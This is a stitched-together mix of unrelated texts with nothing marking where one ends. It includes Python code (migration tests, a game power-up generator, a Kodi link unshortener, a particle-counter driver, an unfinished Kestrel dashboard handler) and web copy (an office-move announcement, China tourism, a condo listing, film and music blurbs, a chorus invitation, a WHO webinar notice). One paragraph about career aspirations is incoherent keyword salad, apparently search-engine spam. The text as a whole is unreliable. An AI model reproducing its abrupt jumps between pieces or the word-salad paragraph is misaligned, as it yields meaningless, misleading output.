        resolver_mock = flexmock(DatabaseManager)
        resolver_mock.should_receive('connection').and_return(None)
        resolver = flexmock(DatabaseManager({}))

        migrator = flexmock(
            Migrator(
                flexmock(
                    DatabaseMigrationRepository(
                        resolver, 'migrations'
                    )
                ),
                resolver
            )
        )

        g = flexmock(glob)
        g.should_receive('glob').with_args(os.path.join(os.getcwd(), '*_*.py')).and_return([
            os.path.join(os.getcwd(), '1_foo.py')
        ])

        migrator.get_repository().should_receive('get_ran').once().and_return(['1_foo'])

        migrator.run(os.getcwd())

    def test_last_batch_of_migrations_can_be_rolled_back(self):
        # Both migrations from the last batch are resolved, run 'down',
        # and deleted from the repository.
        resolver = flexmock(DatabaseManager)
        resolver.should_receive('connection').and_return(None)

        migrator = flexmock(
            Migrator(
                flexmock(
                    DatabaseMigrationRepository(
                        resolver, 'migrations'
                    )
                ),
                resolver
            )
        )

        foo_migration = MigrationStub('foo')
        bar_migration = MigrationStub('bar')
        migrator.get_repository().should_receive('get_last').once().and_return([
            foo_migration, bar_migration
        ])

        bar_mock = flexmock(MigrationStub())
        bar_mock.should_receive('down').once()
        foo_mock = flexmock(MigrationStub())
        foo_mock.should_receive('down').once()
        migrator.should_receive('_resolve').with_args(os.getcwd(), 'bar').once().and_return(bar_mock)
        migrator.should_receive('_resolve').with_args(os.getcwd(), 'foo').once().and_return(foo_mock)

        migrator.get_repository().should_receive('delete').once().with_args(bar_migration)
        migrator.get_repository().should_receive('delete').once().with_args(foo_migration)

        migrator.rollback(os.getcwd())

    def test_rollback_migration_can_be_pretended(self):
        # As above but pretend=True: 'down' is still exercised through the
        # pretending connection, and no 'delete' calls are expected.
        resolver_mock = flexmock(DatabaseManager)
        resolver_mock.should_receive('connection').and_return({})
        resolver = flexmock(DatabaseManager({}))
        connection = flexmock(Connection(None))
        connection.should_receive('pretend').replace_with(lambda callback: callback(None))
        resolver.should_receive('connection').with_args(None).and_return(connection)

        migrator = flexmock(
            Migrator(
                flexmock(
                    DatabaseMigrationRepository(
                        resolver, 'migrations'
                    )
                ),
                resolver
            )
        )

        foo_migration = MigrationStub('foo')
        bar_migration = MigrationStub('bar')
        migrator.get_repository().should_receive('get_last').once().and_return([
            foo_migration, bar_migration
        ])

        bar_mock = flexmock(MigrationStub())
        bar_mock.should_receive('down').once()
        foo_mock = flexmock(MigrationStub())
        foo_mock.should_receive('down').once()
        migrator.should_receive('_resolve').with_args(os.getcwd(), 'bar').once().and_return(bar_mock)
        migrator.should_receive('_resolve').with_args(os.getcwd(), 'foo').once().and_return(foo_mock)

        migrator.rollback(os.getcwd(), True)

    def test_nothing_is_rolled_back_when_nothing_in_repository(self):
        # Empty last batch: rollback is a no-op, no '_resolve'/'delete'.
        resolver = flexmock(DatabaseManager)
        resolver.should_receive('connection').and_return(None)

        migrator = flexmock(
            Migrator(
                flexmock(
                    DatabaseMigrationRepository(
                        resolver, 'migrations'
                    )
                ),
                resolver
            )
        )

        migrator.get_repository().should_receive('get_last').once().and_return([])

        migrator.rollback(os.getcwd())


class MigrationStub(Migration):
    """Minimal Migration double with no-op up/down.

    __getitem__ returns the stored name — presumably the Migrator indexes
    repository records like mappings; confirm against Migrator internals.
    """

    def __init__(self, migration=None):
        self.migration = migration

    def up(self):
        pass

    def down(self):
        pass

    def __getitem__(self, item):
        return self.migration
Our new home in Sauk City! After 17 years at the Dallas Street location, we have up and moved just down the street to 855 Community Drive. Though we will miss our home of so many years, the move was needed to house our ever-growing and expanding group of professional staff. We were bursting at the seams at our old location and went searching for something to fit our needs and budget. We were able to purchase a building nearby and started working on the plans to renovate it for our own use. All design was in-house and our team did a fabulous job in turning words and visions in to plans, construction and finishing touches. Our Civil department pulled off a beautiful site design. The structural department provided the framework for the architectural staff to creatively work with. Our mechanical systems not only fit our needs today but they are designed to expand with us into the future. The goal was for our facility to look and feel “crisp and professional” and our interior designer pulled that off to a tee. It is amazing how each and every aspect was pre-planned, prepared for, and then implemented. Our CEO wanted everyone to be involved and requested anyone who had ideas or input to say so. This all started well before our actual designs were starting and continued throughout the design and construction process. All ideas were seen as important and considered. Some were incorporated and some were not. It just goes to show how personally vested everyone has been. Even after design, our employees were excited and involved. From planning logistics, to packing, to putting furniture together, to setting up workstations and more, everyone at Ramaker jumped in to help. Our new office home is bright and airy, with room for growth. There’s more office space, break room space, and parking space. We have commuter bikes for lunchtime errands or just a brief getaway from the office. There are splashes of color and abundant plant life everywhere. And the entrance…..just wow! 
After all this, it’s time to party! Join us in moving on to bigger and better things at our Open House event on Wednesday, November 4th at 5:00 pm.
import random

from objects.globals.gamesettings import GameSettings
from objects.powerup import PowerUp


class PowerUpGenerator:
    """Base class for power-up generators.

    Holds the shared game context (player, image resources, sprite groups)
    and provides the common spawn logic; subclasses decide *when* to spawn
    by overriding generate().
    """

    def __init__(self, player, imgResources, all_sprites, powerups):
        self.player = player
        self.imgResources = imgResources
        self.all_sprites = all_sprites
        self.power_ups = powerups

    def _spawn(self, power_up_type):
        """Create a power-up of the given type at a random x position
        along the top edge and register it in both sprite groups.

        Extracted here because all three subclasses previously duplicated
        this exact creation/registration code.
        """
        power_up = PowerUp((random.randint(200, GameSettings.WIDTH - 200), 0),
                           self.imgResources.power_ups, power_up_type)
        self.power_ups.add(power_up)
        self.all_sprites.add(power_up)

    def generate(self):
        """Base dummy implementation for generating a power-up."""
        pass


class ShieldGenerator(PowerUpGenerator):
    """Generates random shield"""

    def generate(self):
        """Spawn a shield only while the player's shield is low, with
        probability controlled by GameSettings.SHIELD_PROP."""
        if self.player.shield < 50 and random.random() > GameSettings.SHIELD_PROP:
            self._spawn(self.imgResources.POWER_UP_SHIELD)


class GunGenerator(PowerUpGenerator):
    """Generates random gun"""

    def generate(self):
        """Spawn a gun with probability controlled by GameSettings.GUN_PROP."""
        if random.random() > GameSettings.GUN_PROP:
            self._spawn(self.imgResources.POWER_UP_GUN)


class FuelGenerator(PowerUpGenerator):
    """Generates random fuel pack"""

    def generate(self):
        """Spawn a fuel pack only when fewer than 2 fuel power-ups are
        already on screen and the player's fuel is low."""
        count = len(list(filter(lambda x: x.type == self.imgResources.POWER_UP_FUEL,
                                self.power_ups)))
        if count < 2 and self.player.fuel < 80 and random.random() > GameSettings.FUEL_PROP:
            self._spawn(self.imgResources.POWER_UP_FUEL)
China is a vast land, rich in tourism resources. It ranks among the world's leaders in scenic spots and historical sites, spectacular landscapes, and colorful and varied national customs. China is forever linked to its ancient civilization, friendly people, and many of the world's most revered treasures, such as The Great Wall, the Terra-Cotta Warriors and Horses and the Yangtze River. Today, one can also find spectacular architecture and towering skylines in Shanghai and Beijing, a wealth of luxury accommodations and exquisite cuisine. China's capital city Beijing is also known as a tourist city for its many places of interest, including ancient architecture, royal gardens, mansions, towers, temples, palaces, and modern structures. Another famous tourist spot, Chengdu, has many places of interest and is famous for its traditional arts and crafts, ethnic folklore, and beautiful landscapes. The flourishing coastal city of Dalian is the major port for this northeastern province and is a magnet for foreign investors. A metropolis both ancient and modern, Nanjing has many places of interest, such as the Confucian Temple and the Sun Yat-sen Mausoleum. Shanghai is an ideal "shopping paradise." There are over a thousand restaurants serving the famous 16 styles of Chinese food. Shanghai has convenient land, air and sea transportation, rich tourist resources, a vast variety of foods and recreational facilities. Come and see why China is drawing millions of visitors from all over the world. Stay in comfortable budget hotels in China and experience Chinese hospitality and culture.
# -*- coding: utf-8 -*-
"""
Dump tdx_flow files to pickle

Created on Sun Jul 26 18:51:24 2015
@author: Sein Tao
@email: sein.tao@gmail.com
"""
# import sys
# sys.path.append("..")
import os
import pickle
import datetime
import dateutil.relativedelta
from parse_flow import parse_tdx_flow, FlowRecord

# Raw string: "\P", "\F" and "\S" are invalid escape sequences in a regular
# string literal (DeprecationWarning since Python 3.6); the value is unchanged.
datadir = r"D:\Personal\Finnance\Stock\Flow"


def dump_flow(month_start, month_end, outfile, datadir=datadir):
    """Dump tdx_flow files to pickle.

    Parses every monthly export 'flowYYYYMM.xls' in ``datadir`` between
    ``month_start`` and ``month_end`` (inclusive, 'YYYYMM' strings) and
    pickles the combined record list to ``outfile``.

    Raises:
        ValueError: if month_start is after month_end.
    """
    str2date = lambda x: datetime.datetime.strptime(x, '%Y%m')
    date2str = lambda x: datetime.datetime.strftime(x, '%Y%m')
    one_month = dateutil.relativedelta.relativedelta(months=1)
    start, end = str2date(month_start), str2date(month_end)
    if start > end:
        raise ValueError("start month should be less than end month")
    recs = []
    current = start
    while current <= end:
        # 'path' instead of 'file': avoids shadowing the Python 2 builtin.
        path = os.path.join(datadir, 'flow' + date2str(current) + ".xls")
        recs.extend(parse_tdx_flow(path))
        current += one_month
    with open(outfile, 'wb') as fh:
        pickle.dump(recs, fh)


def dump2txt(dump_file, out_file):
    """Convert a pickle written by dump_flow to a tab-separated text file.

    Context managers guarantee both files are closed even on error
    (the original left the handles open if writing raised).
    """
    with open(dump_file, 'rb') as ih:
        data = pickle.load(ih)
    with open(out_file, 'w') as oh:
        oh.write("#" + "\t".join(FlowRecord.Raw._fields) + "\n")
        for rec in data:
            oh.write("\t".join(rec.raw))
            oh.write("\n")


def load_flow(dump_file):
    """Load and return the record list pickled by dump_flow.

    Fix: the original ``pickle.load(open(...))`` never closed the file.
    """
    with open(dump_file, 'rb') as fh:
        return pickle.load(fh)


if __name__ == '__main__':
    data_file = os.path.join(datadir, '2014.pickle')
    #dump_flow('201405', '201412', data_file)
    #data = pickle.load(open(data_file, 'rb'))
    #dump2txt(data_file, os.path.join(datadir,'2014.txt'))

    import unittest

    class Test(unittest.TestCase):
        def setUp(self):
            self.ref = os.path.join(datadir, '2014.pickle')
            self.tmp = "tmp/flow.pickle"

        def test_dump(self):
            import filecmp
            dump_flow('201405', '201412', self.tmp)
            self.assertTrue(filecmp.cmp(self.ref, self.tmp))

        def test_load(self):
            self.assertEqual(load_flow(self.ref), load_flow(self.tmp))

    from util import runTestCase
    runTestCase(Test)
Chart britain s top childhood career aspirations statista leap skills academy helping students achieve their dream job occupation aspiration concept stock photo. Long term illustration of to climb the and make big inspiration motivational social justice innovation person. Focused resume example best online builder sn chieni cookson educational among in no more than words. Testing your path ministry photo attitude agriculture. Business essay success managers the. Research paper reasons for choosing quotes we love key talent development asia blog among. Goals our work women retailing springer examples application form sample customer service news insights aspirations. Statements doc tk vaibhav pathare retail builder. Combining entrepreneurship web high school personality types a major determining factor. Undergraduate dissertation examples essay methodology introduction dream job occupation career aspiration concept stock photo best images about karmic ally coaching s collection of. Aspirations resume online builder e library embedding of employer and practitioner input into college paper academic writing service. Top interview questions security guards companies. Apple bridge fully funded apprenticeships sn chieni cookson educational among on goals essay. Our work awards unb goal in builder. Boy thinking image essays for the future scholarship little figures picture why are so few women promoted management positions pdf customer service objective becoming unapologetic heya emily handdrawn men image. Shyenne horras. Career beliefs of greek and non vocational education students aerospace studies scholarship opportunities wia objectives goals essay. Great expectations teenagers aspirations versus the careers long term aspiration. Answering plan interview questions men vs women how gender can impact key examples. Talent development asia blog not sure what your current are or you yours personal professional infographic. 
Class shares employee engagement working for life workers their. Global aspiration survey manpowergroup management search results shadrack oiye. Illustration business stock dream job occupation concept photo image youth in n archives is examples statements essay resume. Achievement as a group jinho jace park becoming unapologetic heya emily. Engineering perceptions soft skills industry our work infographic online publication. Science minority ethnic best quotes sayings financial outlook profit road modern african r ce novels amu dat. Gulf news advertisement hr s training programs.
# -*- coding: utf-8 -*- import arrow from flask import ( render_template, current_app, url_for ) from feedback.database import ( Column, db, Model ) from feedback.utils import send_email class Monthly(Model): ''' The monthly report model - this only contains one field: a string of e-mails separated by commas if necessary. ''' __tablename__ = 'monthly-report' id = Column(db.Integer, primary_key=True, index=True) email_list = Column(db.String(200), nullable=True) def __repr__(self): return '<Monthly(id:{0}, emails:{1})>'.format( self.id, self.email_list) def send_report(self): ''' From an instance of the Monthly model, send out an e-mail saying that this months monthly report is ready. This gets pinged from a server task every month through Heroku. In theory. ''' if self.email_list is None: subj = 'Permitting Inspection Center Monthly Status Report' current_app.logger.info( 'NO-EMAIL-ADDRESS | Subject: {}'.format(subj)) else: subj = 'Permitting Inspection Center Monthly Status Report - {}' from_email = current_app.config.get('ADMIN_EMAIL') last_month = arrow.utcnow().replace(months=-1) date_start, date_end = last_month.span('month') date_header = date_start.format('MMMM, YYYY') year = last_month.format('YYYY') month = last_month.format('MM') report = url_for( 'reports.overview', _external=True, year=year, month=month) send_email( subj.format(date_header), from_email, self.email_list, render_template('email/monthly_notification.txt', date_header=date_header, report=report), render_template('email/monthly_notification.html', date_header=date_header, report=report))
Built in 1902 as The Belgravia Hotel and also known as Peale House, The Belgravia Condominiums places residents in the middle of the best that Center City Philadelphia has to offer. Having been added to the National Register of Historic Places in 1982, The Belgravia’s beautiful Beaux-Arts exterior and lobby lined with stained-glass windows complement the elegance that permeates the building’s living spaces. Condo units feature spacious living areas, marble bathrooms, and stackable washer and dryers. Kitchens feature stainless steel appliances and granite counter tops. Building amenities include 24/7 doorman and concierge, 24-hour on-site gym, and a recently updated lobby. The Belgravia is situated just steps away from Rittenhouse Square and Center City Philadelphia’s business district. Residents can enjoy fine dining and retail on Chestnut and Walnut Streets or can take nearby public transportation to explore other parts of the city. Let the James ‘Right’ Price’s real estate acumen find your new Philadelphia luxury conominium home in this historic and conveniently-located architectural gem today!
from __future__ import print_function import sys sys.path.insert(1,"../../../") from tests import pyunit_utils import h2o from h2o.utils.typechecks import assert_is_type from h2o.exceptions import H2OConnectionError def h2oinit(): """ Python API test: h2o.init(url=None, ip=None, port=None, https=None, insecure=None, username=None, password=None, cookies=None, proxy=None, start_h2o=True, nthreads=-1, ice_root=None, enable_assertions=True, max_mem_size=None, min_mem_size=None, strict_version_check=None, **kwargs) """ start_h2o = False strict_version_check = False print("Testing h2o.init() command...") try: h2o.init(start_h2o=start_h2o) print("h2o.init() command works!") except Exception as e: # some errors are okay like version mismatch print("error message type is {0} and the error message is \n".format(e.__class__.__name__, e.args[0])) assert_is_type(e, H2OConnectionError) try: h2o.init(strict_version_check=strict_version_check, start_h2o=start_h2o) except Exception as e: print("error message type is {0} and the error message is \n".format(e.__class__.__name__, e.args[0])) assert_is_type(e, H2OConnectionError) # try to join a cluster and test out various command arguments ipS = "127.16.2.27" portS = "54321" nthread = 2 max_mem_size=10 min_mem_size=3 try: h2o.init(ip=ipS, port=portS, nthreads=nthread, max_mem_size=max_mem_size, min_mem_size=min_mem_size, start_h2o=start_h2o, strict_version_check=strict_version_check) print("Command h2o.init(ip=ipS, port=portS, nthreads=nthread, max_mem_size=max_mem_size, " "min_mem_size=min_mem_size,start_h2o=start_h2o, strict_version_check=strict_version_check) works!") except Exception as e: # make sure correct error message is received print("error message type is {0} and the error message is \n".format(e.__class__.__name__, e.args[0])) assert_is_type(e, H2OConnectionError) if __name__ == "__main__": pyunit_utils.standalone_test(h2oinit) else: h2oinit()
Apex Zero took some time out recently to speak with Andrew Kay for British magazine Guestlist about his new album “Reality Provoking Liberation”, which was released on Monday 28th October. It’s the debut solo album from the London rapper and producer, a brief departure from his work as part of the hip hop duo First and Last. It’s had an impressive media response in the past couple of months, with an appreciation not only for the conscientious lyricism addressing a range of political and social issues, but also for the ferocity of the delivery and quality in production.
# -*- coding: utf-8 -*- # Copyright 2020 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # import proto # type: ignore __protobuf__ = proto.module( package='google.ads.googleads.v7.resources', marshal='google.ads.googleads.v7', manifest={ 'AdScheduleView', }, ) class AdScheduleView(proto.Message): r"""An ad schedule view summarizes the performance of campaigns by AdSchedule criteria. Attributes: resource_name (str): Output only. The resource name of the ad schedule view. AdSchedule view resource names have the form: ``customers/{customer_id}/adScheduleViews/{campaign_id}~{criterion_id}`` """ resource_name = proto.Field( proto.STRING, number=1, ) __all__ = tuple(sorted(__protobuf__.manifest))
The story of the prophet who abandons his family and the woman he loves, in order to relay God’s message in Jerusalem. Although he is persecuted and branded as a traitor for warning others of the destruction of the Holy City, he continues fearlessly with his mission. When his prophecy is fulfilled, he experiences first-hand Jerusalem’s destruction by the Babylonians. Starring two-time Golden Globe® nominee Patrick Dempsey (TV’s “Grey’s Anatomy,” Made of Honor) as Jeremiah, Oscar® nominee Klaus Maria Brandauer (Best Supporting Actor, Out of Africa, 1985) as King Nebuchadnezzar, and Oliver Reed (Gladiator, Tommy) as General Safan. We had read Jeremiah many times, but somehow when we watched this film, it came alive and the scripture made more sense with the context. Also another fairly accurate rendering.
# -*- coding: utf-8 -*-
#---------------------------------------------------------------------
'''
Created on 02 Jan 2016
@author: Seko
@summary: Class for resolving (unshortening) shortened links.

Python 2 / Kodi (XBMC) add-on code: uses urllib2/cookielib and the
xbmcgui progress dialog while waiting out the ad-shortener delay.
'''
#---------------------------------------------------------------------
# ____________________ I M P O R T ____________________
import re
import urllib
import urllib2
import copy
import traceback
import cookielib
import time
import json
import xbmcgui
import constant
import webUtil
from urlparse import urlsplit

# ____________________ C L A S S ____________________


class UnshortenUrl(object):

    # Hostname patterns for the supported shortener services.
    PATTERN_VIIDME = r'viid\.me'
    PATTERN_CLLKME = r'cllkme\.com'
    PATTERN_SHST = r'sh\.st'
    # sh.st "freeze" links embed the real short URL after this 20-char prefix.
    PATTERN_SHST_WITH_FREEZE = r'http://sh.st/freeze/'
    PATTERN_DPSTREAM = r'https://www.dpstream.net/external_link/'

    def __init__(self):
        """ Constructor: set up a browser-like header set and a cookie-aware
        opener (redirects handled by webUtil.SmartRedirectHandler). """
        self.HEADER_CFG = {
            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
            'Accept-Charset': 'ISO-8859-1,utf-8;q=0.7,*;q=0.3',
            'Accept-Encoding': 'none',
            'Accept-Language': 'en-US,en;q=0.8',
            'Connection': 'keep-alive'}
        self.cookiejar = cookielib.CookieJar()
        self.urlOpener = urllib2.build_opener(urllib2.HTTPCookieProcessor(self.cookiejar),webUtil.SmartRedirectHandler())

    def unshortUrl(self,url):
        """ Method to unshort url.
        Repeatedly resolves one level of shortening until the URL stops
        changing (handles chained shorteners).
        @param url: the url to unshort
        @return the final url
        """
        newUrl = self._unshort(url)
        while url != newUrl:
            url = newUrl
            newUrl = self._unshort(url)
        return newUrl

    def _unshort(self,url):
        """ Resolve one level of shortening.
        @param url: the url to unshort
        @return the resolved url, or the input unchanged when no known
                shortener pattern matches (or the URL has no host part)
        """
        domain = urlsplit(url).netloc
        if not domain:
            # Not an absolute URL; nothing to resolve.
            return url
        if re.search(self.PATTERN_VIIDME,url):
            return self._unshortshst(url,'viid.me')
        if re.search(self.PATTERN_CLLKME,url):
            return self._unshortshst(url,'cllkme.com')
        elif re.search(self.PATTERN_SHST_WITH_FREEZE,url):
            # Strip the 20-char 'http://sh.st/freeze/' prefix, then resolve
            # the embedded sh.st link.
            return self._unshortshst(url[20:])
        elif re.search(self.PATTERN_SHST,url):
            return self._unshortshst(url)
        elif re.search(self.PATTERN_DPSTREAM,url):
            return self._unshortdpstream(url)
        else:
            return url

    def _unshortshst(self,url,host='sh.st'):
        """ Resolve a sh.st-style ad shortener link (sh.st, viid.me, cllkme.com).
        Scrapes the ad session id from the page, waits out the mandatory 5-second
        ad delay (showing a Kodi progress dialog), then asks the end-adsession
        endpoint for the destination URL.
        @param url: the url to unshort
        @param host: the shortener host used to build the end-adsession request
        @return the destination url, or the input url on any failure
        """
        if url.endswith('/'):
            url = url[:-1]
        request = urllib2.Request(url, headers=self.HEADER_CFG)
        response = None
        try:
            response = self.urlOpener.open(request)
            if response is not None and response.getcode() == 200:
                content = response.read()
                # The page embeds 'sessionId: "<id>",' in inline javascript.
                sessionPattern = re.compile('(.*)(sessionId: ")(.{1,50})(",)(.*)',re.DOTALL)
                match = sessionPattern.match(content)
                if match is not None:
                    # ___ Extract the ad session id from the matched group
                    adSessionId = match.group(3)
                    # ___ Build the end-adsession query URL
                    urlEnd = 'http://'+host+'/shortest-url/end-adsession?'
                    data1 = {'adSessionId':adSessionId,'callback':'c'}
                    dataStr = urllib.urlencode(data1)
                    urlEnd+=dataStr
                    # ___ Headers must carry the shortener host and the original
                    # page as referer or the endpoint rejects the request.
                    headers1 = copy.copy(self.HEADER_CFG)
                    headers1["Host"] = host
                    headers1["Referer"] = url
                    # ___ Wait the mandatory 5 seconds, updating a progress
                    # dialog (20% per elapsed second).
                    currentSecond = 5
                    dp = xbmcgui.DialogProgress()
                    dp.create(constant.__addon__.getLocalizedString(33057),str(currentSecond)+' secondes')
                    while currentSecond > 0:
                        currentSecond = currentSecond-1
                        dp.update((5-currentSecond)*20, str(currentSecond)+' secondes')
                        time.sleep(1)
                    dp.close()
                    dp = None
                    # ___ Request the final url
                    requestEnd = urllib2.Request(urlEnd,headers=headers1)
                    responseEnd = None
                    try:
                        responseEnd = self.urlOpener.open(requestEnd)
                    except urllib2.HTTPError as e:
                        # HTTPError objects still expose getcode()/read();
                        # keep it and inspect the status below.
                        responseEnd = e
                    except:
                        traceback.print_exc()
                    if responseEnd is not None and responseEnd.getcode() == 200:
                        # ___ Response is a JSONP payload ('c("...");'); strip
                        # the 6-char callback prefix and trailing ');' before
                        # parsing.
                        contentEnd = responseEnd.read()
                        jsonResult = json.loads(contentEnd[6:-2].decode('utf-8'))
                        return jsonResult['destinationUrl']
        except:
            traceback.print_exc()
        # Fall through on any failure: return the URL unresolved.
        return url

    def _unshortdpstream(self,url):
        """ Resolve a dpstream external_link redirect page.
        Scrapes the destination out of an inline "window.open(...)" call.
        @param url: the url to unshort
        @return the destination url, or the input url on any failure
        """
        if url.endswith('/'):
            url = url[:-1]
        print url
        request = urllib2.Request(url, headers=self.HEADER_CFG)
        response = None
        try:
            response = self.urlOpener.open(request)
            if response is not None and response.getcode() == 200:
                content = response.read()
                index = content.find('window.open')
                if index > 0:
                    # Match the first window.open(\'<url>\',\'_blank\') call;
                    # the quotes are backslash-escaped in the page source.
                    getUrlPattern = re.compile("(.*)(window.open\(\\\\')(.*)(\\\\',\\\\'_blank\\\\')(.*)",re.MULTILINE)
                    match = getUrlPattern.match(content[index:])
                    if match is not None:
                        return match.group(3)
                    else:
                        print content
        except:
            traceback.print_exc()
        return url
So . . . . Where do you like to do your singing? In front of others - We would love to have your voice with us. I’m sure we could both learn from one another. Alone - I like to sing alone, too, because no one is there to judge me. That’s how I feel when I sing with the Racing City Chorus. We have everyone from pure beginners with no musical experience to the very talented, but the nice thing is we all get better together. We even give you learning tracks with your part on one side and the other three parts on the other so you can balance it however you want and sing whenever you want. So, it’s fun. And none of the choices is any better or worse than any other because YOU CAN. I know of no other organization on the planet that offers you so many choices for whatever tickles your fancy. The singing and friendship are such a change of pace from the daily grind. Come and check it out for a night and see how much fun it really is. We meet on Tuesday nights at the Living Waters Church, 4330 RT. 50, Wilton NY 12866 at 7:30. I would be happy to share a ride with you and pick you up. No pressure – just fun.
'''
uvscada
Copyright 2012 John McMaster <JohnDMcMaster@gmail.com>
Licensed under the terms of the LGPL V3 or later, see COPYING for details
'''
'''
I suspect all DC1100 units have the PC interface internally and just aren't brought outside
Not sure how hard that is to do yourself though
Also the manual hints that there is no internal difference between the pro and regular units
The only difference is the calibration
'''

import serial
#import uvscada.serial
import re

'''
Small particles are displayed on the left
Large particles are displayed on the right

Regular
Small: Detection limit of 1 micron (um)
Large: ~5 um

Pro
Small: 0.5 um
Large: 2.5 um

Values are scaled to represent concentration of particles in 0.01 cubic foot of sampled air
Since this object only reports density it doesn't matter what these actual size values are
'''


class Measurement:
    '''One particle-count reading: small and large counts per 0.01 ft**3.'''

    # Air-quality buckets (manual page 12); a larger value means cleaner air.
    VERY_POOR = 1
    POOR = 2
    FAIR = 3
    GOOD = 4
    VERY_GOOD = 5
    EXCELLENT = 6

    @staticmethod
    def quality_str(q):
        '''Return the symbolic name for quality constant q, or None if unknown.'''
        vals = ['VERY_POOR', 'POOR', 'FAIR', 'GOOD', 'VERY_GOOD', 'EXCELLENT']
        for v in vals:
            # Look the constant up by name; the original used
            # eval('Measurement.' + v), which getattr() does safely.
            if q == getattr(Measurement, v):
                return v
        return None

    def __init__(self, small, large):
        # Raw counts per 0.01 ft**3 of sampled air.
        self.small = small
        self.large = large

    def small_cpf(self):
        '''Small-particle count per cubic foot (FED-STD-209E units).'''
        return self.small * self.cpf_conversion()

    def large_cpf(self):
        '''Large-particle count per cubic foot (FED-STD-209E units).'''
        return self.large * self.cpf_conversion()

    def cpf_conversion(self):
        # Convert particles / (0.01 ft**3) to particles / ft**3
        # (as used in FED-STD-209E)
        return 1 / 0.01

    def small_cpm(self):
        '''Small-particle count per cubic meter.'''
        return self.small * self.cpm_conversion()

    def large_cpm(self):
        '''Large-particle count per cubic meter.'''
        return self.large * self.cpm_conversion()

    def cpm_conversion(self):
        # Convert particles / (0.01 ft**3) to particles / m**3
        # 3531.466672149
        return 1 / (0.01 * ((12.0 * 25.4 / 1000.0)**3))

    def valid(self):
        '''Sanity-check a parsed reading; reject out-of-range or inconsistent counts.'''
        # Some arbitrary high limits to detect a bad data parse
        if self.small > 100000 or self.small < 0:
            return False
        if self.large > 100000 or self.large < 0:
            return False
        # Assumes the small count always exceeds the large count on this
        # sensor (original author's note: "I'm not sure if this is
        # actually true").
        return self.small > self.large

    @staticmethod
    def parse(s):
        '''Parse a "small,large" serial line into a Measurement, or None on bad input.'''
        # Reading should be
        # 1231,422
        parsed = re.match('([0-9]+)[,]([0-9]+)', s)
        if not parsed:
            return None
        return Measurement(int(parsed.group(1)), int(parsed.group(2)))


class DC1100:
    '''Serial interface to a Dylos DC1100 particle counter.'''

    def __init__(self, device):
        #if device is None:
        #    device = uvscada.serial.get_device()
        self.device = device
        self.serial = serial.Serial(self.device, 9600, timeout=1)
        self.last_meas = None

        # Canned (small, large) tuples for offline testing:
        # start out, spike, and then drop back
        self.test_meas = []
        #self.test_meas = [(100, 10), (100, 10), (100, 10), (100, 10), (1000, 100), (1000, 100), (1000, 100), (100, 10), (100, 10), (100, 10), (100, 10), (100, 10)]

    def wait_meas(self, require_valid=False):
        '''Don't return until a measurement is available.

        With require_valid=True, keep reading until Measurement.valid() passes.
        Canned test measurements, if any, are consumed first.
        '''
        if len(self.test_meas) > 0:
            m = Measurement(*self.test_meas[0])
            self.test_meas = self.test_meas[1:]
            self.last_meas = m
            return m
        while True:
            m = self.meas()
            if m and ((not require_valid) or m.valid()):
                return m

    def meas(self):
        '''Read one line from the serial port and parse it.

        The unit emits one measurement per minute; may return None on a
        parse failure.
        '''
        # Read until newline
        s = ''
        while True:
            c = self.serial.read()
            if c == '\n':
                break
            s += c
        self.last_meas = Measurement.parse(s)
        return self.last_meas

    def quality(self):
        '''
        manual page 12 definition
        Although manual does not say these are small particle counts
        the back of the unit does
        '''
        if self.last_meas is None:
            return None
        return self.meas_quality(self.last_meas)

    def quality_str(self):
        '''Symbolic name for quality() of the last measurement.'''
        return Measurement.quality_str(self.quality())

    def meas_quality(self, meas):
        '''
        manual page 12 definition
        Although manual does not say these are small particle counts
        the back of the unit does
        '''
        small = meas.small
        if small >= 1000:
            return Measurement.VERY_POOR
        elif small >= 350:
            return Measurement.POOR
        elif small >= 100:
            return Measurement.FAIR
        elif small >= 50:
            return Measurement.GOOD
        elif small >= 25:
            return Measurement.VERY_GOOD
        elif small >= 0:
            return Measurement.EXCELLENT
        else:
            raise Exception('Malformed measurement')


class DC1100Pro(DC1100):
    '''DC1100 Pro: same protocol, different quality thresholds (calibration).'''

    def __init__(self, dev):
        DC1100.__init__(self, dev)

    def meas_quality(self, meas):
        small = meas.small
        if small >= 3000:
            return Measurement.VERY_POOR
        elif small >= 1050:
            return Measurement.POOR
        elif small >= 300:
            return Measurement.FAIR
        elif small >= 150:
            return Measurement.GOOD
        # 100 would be barely passing class 10k cleanroom
        elif small >= 75:
            return Measurement.VERY_GOOD
        elif small >= 0:
            return Measurement.EXCELLENT
        else:
            raise Exception('Malformed measurement')
The World Health Organisation has launched a series of live streamed panels exploring refugee and migrant health and well-being. The first webinar was titled “True stories: effective advocacy for health and migration”, and focused on the importance of responsible, meaningful and compelling communications efforts to evoke positive change for migrants, refugees and host communities. This live session included leading experts in the diverse fields of medicine, arts, anthropology and museum education. The session was moderated by Salford University Science Communication Lecturer, Dr Erinma Ochu. It was organised by Santino Severoni, Coordinator for Health and Migration, WHO Regional Office for Europe; Jozef Bartovic, Technical Officer (Migration and Health), WHO Regional Office for Europe; and Nils Fietje, Research Officer, WHO Regional Office for Europe. The online audience posted questions live via Slido for the panel to respond to. Find out more about the session here. The next webinar focuses on Mental Health and will be on 5th September 2017.
import logging.config
import local_settings; logging.config.fileConfig(local_settings.logging_config)

import dream
import kestrel_actions
import util

App = dream.App()


@App.expose('/')
def home(request):
    '''Serve the dashboard index page.'''
    return dream.Response(body=util.template('index.html'), content_type='text/html')


@App.expose('/ajax/action.json')
def ajax_action(request):
    '''Run a kestrel admin action on one or more servers/queues.

    Per-queue actions (flush/delete/peek) expect "server,queue" values;
    server-wide actions (flush_all/reload/shutdown) take a bare server name.
    Returns a JSON(P) body with either 'results' or 'error'.
    '''
    callback = request.params['callback'] if 'callback' in request.params else None
    action = request.params['action'] if 'action' in request.params else None
    server_queue = request.params.getall('server') if 'server' in request.params else []

    data = {}
    status = 200
    if len(server_queue) == 0:
        data['error'] = 'Missing server or queue name'
        status = 500
